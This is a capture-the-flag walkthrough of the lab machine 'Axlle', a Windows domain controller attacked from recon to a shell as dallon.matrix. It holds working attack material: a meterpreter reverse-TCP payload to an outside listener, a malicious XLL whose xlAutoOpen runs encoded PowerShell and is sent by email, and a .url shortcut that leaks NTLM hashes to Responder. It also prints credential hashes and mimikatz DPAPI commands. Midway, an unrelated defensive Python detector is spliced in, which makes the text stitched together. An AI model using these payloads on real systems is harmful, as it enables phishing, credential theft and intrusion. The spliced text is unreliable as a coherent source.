Axlle

Recon

nmap_scan.log

On the HTTP web app we see the accounts@axlle.htb email address; add the domain to /etc/hosts.

└─$ grep axl /etc/hosts
10.10.11.21     axlle.htb       mainframe.axlle.htb     hostmaster.axlle.htb

DNS (53)

└─$ dig any axlle.htb @10.10.11.21

; <<>> DiG 9.19.21-1-Debian <<>> any axlle.htb @10.10.11.21
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9957
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;axlle.htb.                     IN      ANY

;; ANSWER SECTION:
axlle.htb.              600     IN      A       10.10.11.21
axlle.htb.              3600    IN      NS      mainframe.axlle.htb.
axlle.htb.              3600    IN      SOA     mainframe.axlle.htb. hostmaster.axlle.htb. 261 900 600 86400 3600
axlle.htb.              600     IN      AAAA    dead:beef::aa32:c39e:cbe5:7d67
axlle.htb.              600     IN      AAAA    dead:beef::1de

;; ADDITIONAL SECTION:
mainframe.axlle.htb.    3600    IN      A       10.10.11.21
mainframe.axlle.htb.    3600    IN      AAAA    dead:beef::1de
mainframe.axlle.htb.    3600    IN      AAAA    dead:beef::aa32:c39e:cbe5:7d67

;; Query time: 159 msec
;; SERVER: 10.10.11.21#53(10.10.11.21) (TCP)
;; WHEN: Sun Jun 23 04:54:41 EDT 2024
;; MSG SIZE  rcvd: 253

SMB

We are not able to enumerate SMB via a null session or default usernames.

└─$ addr=axlle.htb; enum4linux "$addr" | tee enum4linux.log
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 23 05:02:41 2024

 =========================================( Target Information )=========================================

Target ........... axlle.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =============================( Enumerating Workgroup/Domain on axlle.htb )=============================

[E] Can't find workgroup/domain

 =================================( Nbtstat Information for axlle.htb )=================================

Looking up status of 10.10.11.21
No reply from 10.10.11.21

 =====================================( Session Check on axlle.htb )=====================================

[+] Server axlle.htb allows sessions using username '', password ''

 ==================================( Getting domain SID for axlle.htb )==================================

Domain Name: AXLLE
Domain Sid: S-1-5-21-1005535646-190407494-3473065389

[+] Host is part of a domain (not a workgroup)

 ====================================( OS information on axlle.htb )====================================

[E] Can't get OS info with smbclient


[+] Got OS info for axlle.htb from srvinfo: 
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =========================================( Users on axlle.htb )=========================================

[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ===================================( Share Enumeration on axlle.htb )===================================

do_connect: Connection to axlle.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on axlle.htb

 =============================( Password Policy Information for axlle.htb )=============================


[E] Unexpected error from polenum:

[+] Attaching to axlle.htb using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:AXLLE.HTB)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[E] Failed to get password policy with rpcclient

 ========================================( Groups on axlle.htb )========================================

[+] Getting builtin groups:

[+]  Getting builtin group memberships:

[+]  Getting local groups:

[+]  Getting local group memberships:

[+]  Getting domain groups:

[+]  Getting domain group memberships:

 ====================( Users on axlle.htb via RID cycling (RIDS: 500-550,1000-1050) )====================

[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 =================================( Getting printer info for axlle.htb )=================================

Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT

enum4linux complete on Sun Jun 23 05:06:34 2024

HTTP (80)


The backend is an IIS web server.

└─$ curl http://axlle.htb/ -I
HTTP/1.1 200 OK
...
Server: Microsoft-IIS/10.0
Date: Sun, 23 Jun 2024 08:48:27 GMT 

Excel

Reading:

It looks like we can only send Excel documents, and they must not contain macros.


I was first using the https://github.com/0xflagplz/Xll-Payload-Generator tool to generate

Testing stage:

└─$ msfvenom --platform windows --arch x64  -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o test.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Saved as: test.bin
## Credits: https://stackoverflow.com/a/72784177

The testing stage worked, yay! Then I experimented with the connection and it worked!

└─$ msfvenom --platform windows --arch x64  -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.75 LPORT=4444 EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o shell.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor failed with A key could not be found for the XOR Encoder encoder.
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 202552 (iteration=0)
x64/xor_dynamic chosen with final size 202552
Payload size: 202552 bytes
Saved as: shell.bin

But when I was sending the email to the user I was getting nothing back!

## Windows
➜ mkdir temp; py .\XllGen.py -i .\shell.bin -o shell.xll

    Directory: ~\VBoxShare\Xll-Payload-Generator
    
                                @achocolatechippancake
                                            @bobby4111

Successfully wrote unencrypted data to 'temp/main.cpp'
Generated code saved to 'temp/main.cpp'
Templates written to 'temp'
Successfully compiled to 'shell.xll'
Cleanup: 'temp' folder and its contents removed successfully.
---
## Linux
└─$ swaks --to accounts@axlle.htb --from pwn@axlle.htb --header "Subject: Cat pictures" --body "uwu" --attach @./shell.xll

After some trial and error, another tool was suggested: https://github.com/moohax/xllpoc. Clone the project, download a shit ton of C++ stuff along with the SDK, and edit XLL_POC.cpp:

#include "stdafx.h"
#include <cstdlib>
#include <fstream>
#include <iostream>

// Excel calls this export when the add-in is loaded, so whatever runs here
// executes as soon as the .xll is opened.
short __stdcall xlAutoOpen()
{
	system("powershell -e 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");
	return 0;
}

The project generates XLL_POC.dll, which you should rename to XLL_POC.xll, since XLL files are essentially DLL files...
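The attachment policy described above (Excel only, no macros) is evidently enforced on the filename, which is why a renamed DLL sails through. An added example, not from the write-up or either XLL generator project: a content-based attachment check in Python that ignores the extension, parses the PE export table to spot the xlAutoOpen entry point, and looks inside OOXML containers for a vbaProject.bin part. The sample files it checks are constructed in the block; the minimal PE it builds is a header skeleton for testing only and contains no code.

```python
import io
import struct
import zipfile

# Export names that identify a native Excel add-in (XLL); Excel calls xlAutoOpen on load.
XLL_ENTRYPOINTS = {"xlAutoOpen", "xlAutoClose", "xlAutoRegister12", "xlAddInManagerInfo12"}


def _rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA %#x is outside every section" % rva)


def pe_export_names(data):
    """Return the exported symbol names of a PE image, or None if data is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        return None
    n_sections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]         # 0x10B = PE32, 0x20B = PE32+
    export_rva = struct.unpack_from("<I", data, opt + (112 if magic == 0x20B else 96))[0]
    sections = []
    for i in range(n_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    if export_rva == 0:
        return []
    ed = _rva_to_offset(sections, export_rva)
    n_names, names_rva = struct.unpack_from("<I4xI", data, ed + 24)   # NumberOfNames, AddressOfNames
    names_tbl = _rva_to_offset(sections, names_rva)
    names = []
    for i in range(n_names):
        name_off = _rva_to_offset(sections, struct.unpack_from("<I", data, names_tbl + 4 * i)[0])
        names.append(data[name_off:data.index(b"\0", name_off)].decode("ascii", "replace"))
    return names


def classify_attachment(data):
    """Mail-gateway verdict based on file content; the filename extension is never consulted."""
    try:
        exports = pe_export_names(data)
    except (struct.error, ValueError, IndexError):
        return "reject: malformed PE"
    if exports is not None:
        if XLL_ENTRYPOINTS.intersection(exports):
            return "reject: native Excel add-in (XLL)"
        return "reject: PE executable or DLL"
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                if any(n.lower().endswith("vbaproject.bin") for n in z.namelist()):
                    return "reject: macro-enabled OOXML workbook"
        except zipfile.BadZipFile:
            return "reject: malformed zip container"
        return "allow: macro-free OOXML workbook"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "review: legacy OLE2 document (macro check needs an OLE parser)"
    return "reject: unrecognised content"


def build_sample_xll():
    """Constructed minimal PE32+ DLL whose only export is xlAutoOpen (no code, for testing)."""
    sec_rva, sec_off = 0x1000, 0x200
    strings = b"sample.xll\0xlAutoOpen\0"
    export_dir = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, sec_rva + 50, 1, 1, 1,
                             sec_rva + 40, sec_rva + 44, sec_rva + 48)
    body = (export_dir + struct.pack("<I", sec_rva + 0x100)   # AddressOfFunctions[0]
            + struct.pack("<I", sec_rva + 61)                  # AddressOfNames[0] -> "xlAutoOpen"
            + struct.pack("<H", 0) + strings)                  # ordinal table, then strings
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)         # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt = (struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)
           + struct.pack("<II", sec_rva, len(body)) + b"\0" * 120)
    sect = b".edata\0\0" + struct.pack("<IIIIIIHHI", len(body), sec_rva, 0x200, sec_off, 0, 0, 0, 0, 0x40000040)
    header = dos + coff + opt + sect
    return header + b"\0" * (sec_off - len(header)) + body.ljust(0x200, b"\0")


def build_sample_xlsx(with_macro=False):
    """Constructed minimal OOXML container, optionally with a vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        if with_macro:
            z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in [("renamed-dll.xlsx", build_sample_xll()),
                        ("report.xlsx", build_sample_xlsx()),
                        ("report.xlsm", build_sample_xlsx(with_macro=True))]:
        print(label, "->", classify_attachment(blob))
```

The export-table walk is what makes the check robust: an XLL must export xlAutoOpen for Excel to load it, so the entry point cannot be hidden by renaming, and a plain DLL or EXE with no such export is rejected anyway.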

Reverse Shell (gideon.hamill)

PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts                             Group            S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Upgrade the shell with ConPtyShell for more stability and run winPEAS to enumerate the system.

...
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.

╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.20348.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 319B
...
╔══════════╣ Drives Information
╚ Remember that you should search more info inside the other drives
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 2 GB)(Permissions: Users [AppendData/CreateDirectories])
...
╔══════════╣ Checking KrbRelayUp
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
  The system is inside a domain (AXLLE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
╔══════════╣ Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\baz.humphries
    C:\Users\brad.shaw : Accounts [AllAccess]
    C:\Users\calum.scott
    C:\Users\dallon.matrix
    C:\Users\dan.kendo
    C:\Users\Default
    C:\Users\Default User
    C:\Users\gideon.hamill : Accounts [AllAccess], gideon.hamill [AllAccess]
    C:\Users\jacob.greeny
    C:\Users\lindsay.richards : Accounts [AllAccess]
    C:\Users\Public : Interactive [WriteData/CreateFiles]
    C:\Users\simon.smalls : Accounts [AllAccess]
    C:\Users\trent.langdon
...
════════════════════════════════════╣ Processes Information ╠════════════════════════════════════

╔══════════╣ Interesting Processes -non Microsoft-
╚ Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
...
    rundll32(8132)[C:\Windows\system32\rundll32.exe]
    Command Line: "C:\Windows\system32\rundll32.exe" c:\windows\system32\ieframe.dll,OpenURL C:\inetpub\testing\priv.url
   =================================================================================================

    xllrunner(2112)[C:\program files\microsoft office\xllrunner\xllrunner.exe] -- POwn: gideon.hamill
    Command Line: "C:\program files\microsoft office\xllrunner\xllrunner.exe" "C:\Program Files (x86)\hMailServer\Data\axlle.htb\Attachments\240620240144597341-XLL_POC_4445.xll"
   =================================================================================================
...
╔══════════╣ Modifiable Services
╚ Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
    RmSvc: GenericExecute (Start/Stop)
    ConsentUxUserSvc_7b331: GenericExecute (Start/Stop)
    CredentialEnrollmentManagerUserSvc_7b331: GenericExecute (Start/Stop)
    DeviceAssociationBrokerSvc_7b331: GenericExecute (Start/Stop)
    DevicePickerUserSvc_7b331: GenericExecute (Start/Stop)
    DevicesFlowUserSvc_7b331: GenericExecute (Start/Stop)
    PimIndexMaintenanceSvc_7b331: GenericExecute (Start/Stop)
    PrintWorkflowUserSvc_7b331: GenericExecute (Start/Stop)
    UdkUserSvc_7b331: GenericExecute (Start/Stop)
    UnistoreSvc_7b331: GenericExecute (Start/Stop)
    UserDataSvc_7b331: GenericExecute (Start/Stop)
    WpnUserService_7b331: GenericExecute (Start/Stop)
...
╔══════════╣ Autorun Applications
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================

	Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
...
╔══════════╣ Network Shares
    ADMIN$ (Path: C:\Windows)
    C$ (Path: C:\)
    IPC$ (Path: )
    NETLOGON (Path: C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS)
    SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
    WebTesting (Path: C:\inetpub\testing) -- Permissions: AllAccess
...
╔══════════╣ Checking for DPAPI Master Keys
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
    MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\2e7f95b7-6930-479a-8df8-ac59abbd261b
    Accessed: 6/24/2024 3:06:28 AM
    Modified: 6/24/2024 3:06:28 AM
   =================================================================================================

    MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
    Accessed: 1/1/2024 4:15:54 AM
    Modified: 1/1/2024 4:15:54 AM
   =================================================================================================
...
╔══════════╣ Checking for DPAPI Credential Files
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
    CredFile: C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
    Description: Local Credential Data

    MasterKey: 52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
    Accessed: 1/1/2024 4:15:54 AM
    Modified: 1/1/2024 4:15:54 AM
    Size: 11020
   =================================================================================================
...
╔══════════╣ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    gideon.hamill::AXLLE:1122334455667788:5a5b49070972a5db7aa3c10b497f7760:010100000000000024aa2a2e1ec6da01eb453b8b74c2d6eb0000000008003000300000000000000001000000002000007497a60d8d2660dd079bf7317352d7a79db9a54158fe4ab254d152e774131d730a00100000000000000000000000000000000000090000000000000000000000
...
════════════════════════════════════╣ File Analysis ╠════════════════════════════════════

╔══════════╣ Found PHP_files Files
File: C:\Program Files (x86)\hMailServer\PHPWebAdmin\config-dist.php
...

winPEAS showed useful information for us to explore. First I visited hMailServer; the password may come in handy for something?

PS C:\Program Files (x86)\hMailServer\bin> cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Command to list the shares:

PS C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5> Get-SmbShare

Name       ScopeName Path                                       Description
----       --------- ----                                       -----------
ADMIN$     *         C:\Windows                                 Remote Admin
C$         *         C:\                                        Default share
IPC$       *                                                    Remote IPC
NETLOGON   *         C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS Logon server share
SYSVOL     *         C:\Windows\SYSVOL\sysvol                   Logon server share
WebTesting *         C:\inetpub\testing

Couldn't get the password via the DPAPI cache:

mimikatz # dpapi::masterkey /in:.\2e7f95b7-6930-479a-8df8-ac59abbd261b /rpc 
mimikatz # dpapi::masterkey /in:.\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939 /rpc
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
...
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 00002a46 - 10822
  credUnk0       : 00000000 - 0

  Type           : 00000001 - 1 - generic
  Flags          : 00000000 - 0
  LastWritten    : 1/1/2024 12:15:54 PM
  unkFlagsOrSize : 00000000 - 0
  Persist        : 00000002 - 2 - local_machine
  AttributeCount : 00000020 - 32
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : WindowsLive:target=virtualapp/didlogical
  UnkData        : (null)
  Comment        : PersistedCredential
  TargetAlias    : (null)
  UserName       : 02ibadauxfvernpc
  CredentialBlob :
  Attributes     : 32
...

Enumerate groups:

PS C:\users\public> Get-ADGroup -Properties * -Identity Accounts

CanonicalName                   : axlle.htb/Users/Accounts
CN                              : Accounts
Created                         : 1/1/2024 3:34:49 AM
createTimeStamp                 : 1/1/2024 3:34:49 AM
Deleted                         :
Description                     : Account Managers
DisplayName                     : Accounts
DistinguishedName               : CN=Accounts,CN=Users,DC=axlle,DC=htb
dSCorePropagationData           : {1/2/2024 6:35:21 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:06:50 AM, 1/1/2024 8:08:07 AM...}
GroupCategory                   : Security
GroupScope                      : Global
groupType                       : -2147483646
HomePage                        :
instanceType                    : 4
isDeleted                       :
LastKnownParent                 :
ManagedBy                       :
member                          : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
MemberOf                        : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members                         : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
Modified                        : 1/2/2024 6:35:21 AM
modifyTimeStamp                 : 1/2/2024 6:35:21 AM
Name                            : Accounts
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass                     : group
ObjectGUID                      : 2eeaf150-6c9d-4cea-944b-109ce7197596
objectSid                       : S-1-5-21-1005535646-190407494-3473065389-1104
ProtectedFromAccidentalDeletion : False
SamAccountName                  : Accounts
sAMAccountType                  : 268435456
sDRightsEffective               : 0
SID                             : S-1-5-21-1005535646-190407494-3473065389-1104
SIDHistory                      : {}
uSNChanged                      : 41252
uSNCreated                      : 12791
whenChanged                     : 1/2/2024 6:35:21 AM
whenCreated                     : 1/1/2024 3:34:49 AM

PS C:\users\public> Get-ADGroup -Properties * -Identity Employees

CanonicalName                   : axlle.htb/Users/Employees
CN                              : Employees
Created                         : 1/1/2024 3:34:49 AM
createTimeStamp                 : 1/1/2024 3:34:49 AM
Deleted                         :
Description                     : Employees of Axlle Corp
DisplayName                     : Employees
DistinguishedName               : CN=Employees,CN=Users,DC=axlle,DC=htb
dSCorePropagationData           : {1/2/2024 6:34:14 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:04:46 AM, 1/1/2024 8:08:07 AM...}
GroupCategory                   : Security
GroupScope                      : Global
groupType                       : -2147483646
HomePage                        :
instanceType                    : 4
isDeleted                       :
LastKnownParent                 :
ManagedBy                       :
member                          : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
MemberOf                        : {}
Members                         : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
Modified                        : 1/2/2024 6:34:14 AM
modifyTimeStamp                 : 1/2/2024 6:34:14 AM
Name                            : Employees
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass                     : group
ObjectGUID                      : b03a8fbd-02c5-484e-8390-80b9a425818d
objectSid                       : S-1-5-21-1005535646-190407494-3473065389-1103
ProtectedFromAccidentalDeletion : False
SamAccountName                  : Employees
sAMAccountType                  : 268435456
sDRightsEffective               : 0
SID                             : S-1-5-21-1005535646-190407494-3473065389-1103
SIDHistory                      : {}
uSNChanged                      : 41239
uSNCreated                      : 12787
whenChanged                     : 1/2/2024 6:34:14 AM
whenCreated                     : 1/1/2024 3:34:49 AM

We are part of the Accounts and Employees groups; Accounts seems to be the account managers.

List connections and process names:

PS C:\Users\gideon.hamill> Get-NetTCPConnection -State Listen | % { $name=(Get-Process -Id $_.OwningProcess).ProcessName; $_ | Add-Member -MemberType NoteProperty -Name ProcessName -Value $name; $_ } | Format-Table -Property LocalAddress, LocalPort, RemoteAddress, RemotePort, State, ProcessName -AutoSize

Still nothing eye-catching...

Privilege Escalation (dallon.matrix)

OSINT Testing

Okay, finally I decided to look at where the XLL files were stored, and surprise surprise!

PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
├───accounts
├───Attachments
│       240620241208526673-shell.xll

├───dallon.matrix
│   └───2F
│           {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml

└───ReviewedAttachments
        240620241205223704-HelloWorldXll.xll
        240620241206194486-HelloWorldXll.xll
        240620241207403860-XLL_POC_4445.xll

PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> cat '.\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml'
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
        by MAINFRAME with ESMTP
        ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

Save the usernames for later, just in case.

└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' > usernames.tld.txt
└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' | cut -d '@' -f 1 > usernames.txt

Create the file:

PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=\\\\10.10.16.75\\uwu" > test.url

Meanwhile start responder:

└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0
...
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.21
[SMB] NTLMv2-SSP Username : AXLLE\dallon.matrix
[SMB] NTLMv2-SSP Hash     : dallon.matrix::AXLLE:469b53838a03ba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
[*] Skipping previously captured hash for AXLLE\dallon.matrix
[*] Skipping previously captured hash for AXLLE\dallon.matrix
...

User.txt

Well, the hash couldn't be cracked with rockyou. It turns out you can also open files with the file:// protocol, so let's get a reverse shell:

PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=file:///Users/Public/rev.exe" > test.url
---
meterpreter > getuid
Server username: AXLLE\dallon.matrix
meterpreter > shell
Process 4372 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.

C:\>cd %USERPROFILE%
